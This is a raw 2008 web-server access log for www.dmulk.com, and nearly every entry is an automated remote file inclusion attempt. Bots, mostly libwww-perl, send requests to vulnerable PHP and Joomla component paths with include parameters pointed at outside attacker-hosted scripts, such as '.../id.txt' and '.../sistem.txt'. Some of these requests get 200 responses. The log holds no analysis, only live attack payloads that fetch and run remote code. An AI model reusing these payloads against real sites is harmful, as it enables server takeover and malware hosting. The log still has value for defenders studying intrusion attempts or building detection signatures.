200.59.145.196 - - [29/May/2008:11:44:55 -0700] "GET //lang.php?subpage=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.59.145.196 - - [29/May/2008:11:44:55 -0700] "GET /logs//lang.php?subpage=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.7.234 - - [29/May/2008:11:45:03 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.7.234 - - [29/May/2008:11:45:03 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.59.145.196 - - [29/May/2008:11:45:09 -0700] "GET /logs/access_080129.log//index.php?themesdir=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.251.172 - - [29/May/2008:11:45:21 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.112.193.46 - - [29/May/2008:11:45:27 -0700] "GET /logs/access_080216.log/newspublish/include.php?path[docroot]=http://infects1337.t35.com/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.112.193.46 - - [29/May/2008:11:45:28 -0700] "GET /newspublish/include.php?path[docroot]=http://infects1337.t35.com/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.112.193.46 - - [29/May/2008:11:45:28 -0700] "GET /logs/newspublish/include.php?path[docroot]=http://infects1337.t35.com/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.203.190 - - [29/May/2008:11:45:30 -0700] "GET /logs/access_080228.log//modules/vwar/admin/admin.php?vwar_root=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.203.190 - - [29/May/2008:11:45:31 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.203.190 - - [29/May/2008:11:45:31 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.203.190 - - [29/May/2008:11:45:31 -0700] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.135.11.22 - - [29/May/2008:11:45:32 -0700] "GET /logs/access_080217.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.135.11.22 - - [29/May/2008:11:45:34 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.0" 200 11590 "-" "libwww-perl/5.803" "www.dmulk.com"
200.135.11.22 - - [29/May/2008:11:45:35 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.197.120 - - [29/May/2008:11:45:45 -0700] "GET /logs/access_080120.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.196.106 - - [29/May/2008:11:45:46 -0700] "GET /logs/access_080106.log//skin/zero_vote/ask_password.php?dir=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.232.196.106 - - [29/May/2008:11:45:46 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.232.196.106 - - [29/May/2008:11:45:46 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.251.172 - - [29/May/2008:11:45:47 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.198.106.61 - - [29/May/2008:11:46:03 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.106.61 - - [29/May/2008:11:46:04 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
75.126.175.155 - - [29/May/2008:11:46:08 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.usa-westen.info/Fotos/save.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
75.126.175.155 - - [29/May/2008:11:46:08 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.usa-westen.info/Fotos/save.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.223.113.2 - - [29/May/2008:11:46:29 -0700] "GET /logs/access.log//index.phpmain.php?x=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.59.25.3 - - [29/May/2008:11:46:30 -0700] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.47.201.117 - - [29/May/2008:11:46:31 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.geocities.com/koeluna/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
72.47.201.117 - - [29/May/2008:11:46:31 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.geocities.com/koeluna/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
200.223.113.2 - - [29/May/2008:11:46:31 -0700] "GET //index.phpmain.php?x=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 5001 "-" "libwww-perl/5.812" "www.dmulk.com"
200.223.113.2 - - [29/May/2008:11:46:36 -0700] "GET /logs//index.phpmain.php?x=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
62.128.131.80 - - [29/May/2008:11:47:04 -0700] "GET //config/dbutil.bck.php?confdir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.128.131.80 - - [29/May/2008:11:47:06 -0700] "GET /logs/access_071225.log//faqsupport/samplefaqsupport.php?path[docroot]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.128.131.80 - - [29/May/2008:11:47:06 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.59.145.196 - - [29/May/2008:11:47:07 -0700] "GET /logs/access_080303.log//index.php?incl=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.59.145.196 - - [29/May/2008:11:47:09 -0700] "GET //index.php?incl=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
213.198.106.61 - - [29/May/2008:11:47:10 -0700] "GET /logs/access_080201.log/modules/My_eGallery/index.php?basepath=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.106.61 - - [29/May/2008:11:47:10 -0700] "GET /modules/My_eGallery/index.php?basepath=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.59.145.196 - - [29/May/2008:11:47:10 -0700] "GET /logs//index.php?incl=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.198.106.61 - - [29/May/2008:11:47:10 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.195.37.180 - - [29/May/2008:11:47:15 -0700] "GET /logs/access_080201.log HTTP/1.0" 200 859311 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
77.221.130.6 - - [29/May/2008:11:47:16 -0700] "GET /logs/access.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.catim.com/leg/on? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.6 - - [29/May/2008:11:47:16 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.catim.com/leg/on? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.6 - - [29/May/2008:11:47:17 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.catim.com/leg/on? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.223.113.2 - - [29/May/2008:11:47:24 -0700] "GET /logs/access_080209.log//index.php?themesdir=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.232.196.106 - - [29/May/2008:11:47:25 -0700] "GET /logs/access_080228.log//modules/TotalCalendar/about.php?inc_dir=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.223.113.2 - - [29/May/2008:11:47:32 -0700] "GET //index.php?themesdir=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.812" "www.dmulk.com"
200.59.145.196 - - [29/May/2008:11:47:34 -0700] "GET /logs/access_080204.log//index.php?incl=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.84.106.68 - - [29/May/2008:11:47:44 -0700] "GET /logs/access_080216.log/newspublish/include.php?path[docroot]=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.106.68 - - [29/May/2008:11:47:44 -0700] "GET /newspublish/include.php?path[docroot]=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.106.68 - - [29/May/2008:11:47:44 -0700] "GET /logs/newspublish/include.php?path[docroot]=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.223.113.2 - - [29/May/2008:11:47:44 -0700] "GET /logs//index.php?themesdir=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.135.11.22 - - [29/May/2008:11:47:49 -0700] "GET /logs/access_080303.log//index.php?incl=http://fuckerboy.fileave.com/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.135.11.22 - - [29/May/2008:11:47:50 -0700] "GET //index.php?incl=http://fuckerboy.fileave.com/id.txt?? HTTP/1.0" 200 11590 "-" "libwww-perl/5.803" "www.dmulk.com"
200.135.11.22 - - [29/May/2008:11:47:52 -0700] "GET /logs//index.php?incl=http://fuckerboy.fileave.com/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.59.145.196 - - [29/May/2008:11:47:55 -0700] "GET /logs/access_080215.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.240.250.130 - - [29/May/2008:11:48:01 -0700] "GET /logs/access_080327.log//Neos_Chronos/header.php?base_folder=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.59.145.196 - - [29/May/2008:11:48:22 -0700] "GET /logs/access_071225.log//lang.php?subpage=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.135.11.22 - - [29/May/2008:11:48:27 -0700] "GET /logs/access_080204.log//index.php?incl=http://fuckerboy.fileave.com/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.232.196.106 - - [29/May/2008:11:48:29 -0700] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.232.196.106 - - [29/May/2008:11:48:29 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.232.196.106 - - [29/May/2008:11:48:29 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.59.145.196 - - [29/May/2008:11:48:52 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.59.145.196 - - [29/May/2008:11:48:55 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
200.223.113.2 - - [29/May/2008:11:48:55 -0700] "GET /logs/access_080225.log//lib/base.php?BaseCfg[BaseDir]=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.223.113.2 - - [29/May/2008:11:48:57 -0700] "GET //lib/base.php?BaseCfg[BaseDir]=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.223.113.2 - - [29/May/2008:11:48:58 -0700] "GET /logs//lib/base.php?BaseCfg[BaseDir]=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.246.42.59 - - [29/May/2008:11:48:58 -0700] "GET /logs/access_080216.log/newspublish/include.php?path[docroot]=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.246.42.59 - - [29/May/2008:11:48:59 -0700] "GET /newspublish/include.php?path[docroot]=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.246.42.59 - - [29/May/2008:11:48:59 -0700] "GET /logs/newspublish/include.php?path[docroot]=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.12.53.176 - - [29/May/2008:11:49:02 -0700] "GET //includes/openid/Auth/OpenID/BBStore.php?openid_root_path=http://h1.ripway.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
195.12.53.176 - - [29/May/2008:11:49:06 -0700] "GET /logs//includes/openid/Auth/OpenID/BBStore.php?openid_root_path=http://h1.ripway.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
72.232.196.106 - - [29/May/2008:11:49:10 -0700] "GET /logs/access_080211.log//modules/vwar/admin/admin.php?vwar_root=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.7.108.240 - - [29/May/2008:11:49:11 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.198.106.61 - - [29/May/2008:11:49:19 -0700] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.234.200.124 - - [29/May/2008:11:49:21 -0700] "GET /logs/access.log/index.php?option=com_custompages&cpage=http://www.privatox.altervista.org/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.135.11.22 - - [29/May/2008:11:49:24 -0700] "GET /logs/access_080215.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.234.200.124 - - [29/May/2008:11:49:24 -0700] "GET /index.php?option=com_custompages&cpage=http://www.privatox.altervista.org/idnews.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
200.234.200.124 - - [29/May/2008:11:49:24 -0700] "GET /logs/index.php?option=com_custompages&cpage=http://www.privatox.altervista.org/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.139.226 - - [29/May/2008:11:49:31 -0700] "GET /logs/access_080201.log/index.php?pagina=http://spyxx.iespana.es/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.163.197.88 - - [29/May/2008:11:49:33 -0700] "GET /logs/access_080303.log//index.php?incl=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.12.53.176 - - [29/May/2008:11:49:33 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
195.12.53.176 - - [29/May/2008:11:49:33 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
208.115.34.17 - - [29/May/2008:11:49:33 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://bikebitsuk.com/temp/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.115.34.17 - - [29/May/2008:11:49:34 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://bikebitsuk.com/temp/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.163.197.88 - - [29/May/2008:11:49:35 -0700] "GET //index.php?incl=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.65" "www.dmulk.com"
66.163.197.88 - - [29/May/2008:11:49:40 -0700] "GET /logs//index.php?incl=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.12.53.176 - - [29/May/2008:11:49:43 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/cahayaindra/queen?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.181.74 - - [29/May/2008:11:50:08 -0700] "GET //cal.func.php?dir_edge_lang=http://tgr-clan.ch/tes? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
207.58.181.74 - - [29/May/2008:11:50:08 -0700] "GET /logs//cal.func.php?dir_edge_lang=http://tgr-clan.ch/tes? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
212.227.251.172 - - [29/May/2008:11:50:08 -0700] "GET /classes/core/language.php?rootdir=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [29/May/2008:11:50:10 -0700] "GET /index.php?p=http://h1.ripway.com/inkamarsya/test.txt??? HTTP/1.1" 200 11606 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
66.163.197.88 - - [29/May/2008:11:50:13 -0700] "GET /logs/access_080204.log//index.php?incl=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.243.253.159 - - [29/May/2008:11:50:23 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.243.253.159 - - [29/May/2008:11:50:24 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.243.253.159 - - [29/May/2008:11:50:24 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.221.130.6 - - [29/May/2008:11:50:49 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.catim.com/leg/on? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.223.113.2 - - [29/May/2008:11:50:50 -0700] "GET /logs/access_080308.log//lang.php?subpage=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.223.113.2 - - [29/May/2008:11:50:51 -0700] "GET //lang.php?subpage=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.223.113.2 - - [29/May/2008:11:50:52 -0700] "GET /logs//lang.php?subpage=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.188.60.54 - - [29/May/2008:11:51:03 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.203.190 - - [29/May/2008:11:51:06 -0700] "GET /logs/access_080220.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.203.190 - - [29/May/2008:11:51:06 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.203.190 - - [29/May/2008:11:51:07 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.203.190 - - [29/May/2008:11:51:10 -0700] "GET /logs/access_080312.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [29/May/2008:11:51:18 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
195.12.53.176 - - [29/May/2008:11:51:18 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
213.198.106.61 - - [29/May/2008:11:51:19 -0700] "GET /logs/access_080118.log/classes/core/language.php?rootdir=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.106.61 - - [29/May/2008:11:51:20 -0700] "GET /classes/core/language.php?rootdir=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.106.61 - - [29/May/2008:11:51:20 -0700] "GET /logs/classes/core/language.php?rootdir=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.59.145.196 - - [29/May/2008:11:51:21 -0700] "GET /logs/access_080418.log//index.phpmain.php?x=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.122.141.72 - - [29/May/2008:11:51:27 -0700] "GET /logs/access_080217.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.141.75 - - [29/May/2008:11:51:28 -0700] "GET /logs/access_080217.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.141.76 - - [29/May/2008:11:51:29 -0700] "GET /logs/access_080217.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.141.72 - - [29/May/2008:11:51:29 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.141.72 - - [29/May/2008:11:51:30 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.141.75 - - [29/May/2008:11:51:31 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.141.75 - - [29/May/2008:11:51:32 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.141.76 - - [29/May/2008:11:51:33 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.141.76 - - [29/May/2008:11:51:33 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.196.106 - - [29/May/2008:11:51:43 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.232.196.106 - - [29/May/2008:11:51:43 -0700] "GET //skin/zero_vote/error.php?dir=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.232.196.106 - - [29/May/2008:11:51:43 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
